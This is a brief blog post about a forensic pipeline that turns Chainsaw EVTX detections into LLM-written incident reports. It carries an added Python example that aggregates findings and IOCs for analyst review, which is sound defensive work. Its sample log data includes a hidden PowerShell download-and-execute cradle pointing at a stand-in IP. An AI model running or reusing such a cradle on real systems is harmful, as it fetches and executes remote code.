ForenSynth AI Evolution — From Chainsaw to Visual DFIR Reports

Automation shouldn't replace judgment; it should buy you time to use it.

Problem

DFIR analysts burn hours turning raw detections into readable narratives. EVTX hunts surface signals, but write-ups lag behind, delaying remediation and weakening portfolio proof. We need a repeatable way to go from logs → findings → human-ready report without sacrificing accuracy or analyst judgment.

Approach

A small pipeline: Chainsaw (Sigma EVTX hunting) → SwiftOnSecurity Sysmon config (clean telemetry) → PowerShell simulator (lab noise) → Python LLM summarizer (structured narrative + IOC table). The human stays in the loop for validation and context, not rote drafting. ...
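The deterministic step between the hunt and the summarizer, as an added example that is not code from the post: a Python function that collapses Chainsaw hits into per-rule findings, builds a deduplicated IOC table and queues high-severity rules for analyst validation before anything reaches an LLM. The input is a constructed sample, and the Chainsaw JSON field names it relies on are assumptions.

```python
import json
import re
from collections import defaultdict
# Constructed sample loosely modelled on the array Chainsaw's `hunt --json` emits.
# The field names used here (name, level, timestamp, document.data.Event) are an
# assumption for this example, not a schema taken from the original post.
CHAINSAW_JSON = r"""[
 {"name": "Suspicious PowerShell Download Cradle", "level": "high", "timestamp": "2025-10-14T12:01:05Z",
  "document": {"kind": "evtx", "data": {"Event": {"System": {"Computer": "LAB-WS01", "EventID": 1},
   "EventData": {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "CommandLine": "powershell -nop -w hidden IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')",
    "Hashes": "SHA256=0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"}}}}},
 {"name": "Suspicious PowerShell Download Cradle", "level": "high", "timestamp": "2025-10-14T12:01:09Z",
  "document": {"kind": "evtx", "data": {"Event": {"System": {"Computer": "LAB-WS02", "EventID": 1},
   "EventData": {"CommandLine": "powershell -nop -w hidden -ep bypass",
    "Hashes": "SHA256=0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"}}}}},
 {"name": "Network Connection To Public IP", "level": "low", "timestamp": "2025-10-14T12:01:07Z",
  "document": {"kind": "evtx", "data": {"Event": {"System": {"Computer": "LAB-WS01", "EventID": 3},
   "EventData": {"DestinationIp": "203.0.113.7", "DestinationPort": "80"}}}}}
]"""

LEVEL_ORDER = {"info": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}
IOC_PATTERNS = {  # conservative extractors; the analyst still validates each entry
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "url": re.compile(r"https?://[^\s'\"()]+"),
    "sha256": re.compile(r"\b[0-9A-Fa-f]{64}\b"),
}
def _strings(obj):
    """Yield every string nested anywhere in a parsed JSON value."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, (dict, list)):
        for v in (obj.values() if isinstance(obj, dict) else obj):
            yield from _strings(v)

def build_report(chainsaw_json):
    """Collapse raw hits into per-rule findings plus a deduplicated IOC table."""
    findings, iocs = {}, defaultdict(set)
    for hit in json.loads(chainsaw_json):
        event = hit["document"]["data"]["Event"]
        f = findings.setdefault(hit["name"], {"level": hit["level"], "count": 0, "hosts": set(),
                                               "first_seen": hit["timestamp"], "last_seen": hit["timestamp"]})
        f["count"] += 1
        f["hosts"].add(event["System"]["Computer"])
        f["first_seen"], f["last_seen"] = min(f["first_seen"], hit["timestamp"]), max(f["last_seen"], hit["timestamp"])
        for text in _strings(event.get("EventData", {})):
            for kind, pat in IOC_PATTERNS.items():
                iocs[kind].update(m.lower() if kind == "sha256" else m for m in pat.findall(text))
    rows = [{"rule": name, **f, "hosts": sorted(f["hosts"])} for name, f in findings.items()]
    rows.sort(key=lambda r: (-LEVEL_ORDER[r["level"]], r["rule"]))  # worst first, stable rule order
    return {"findings": rows, "ioc_table": {k: sorted(v) for k, v in iocs.items()},
            # high/critical rules are queued for human validation, not auto-narrated
            "needs_analyst_review": [r["rule"] for r in rows if LEVEL_ORDER[r["level"]] >= 3]}
```

The returned dict is what gets serialized into the summarizer prompt; the IOC table and review queue are produced here, so the LLM only narrates, it never invents indicators.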

October 14, 2025 · 3 min · Luis Camacho Jr.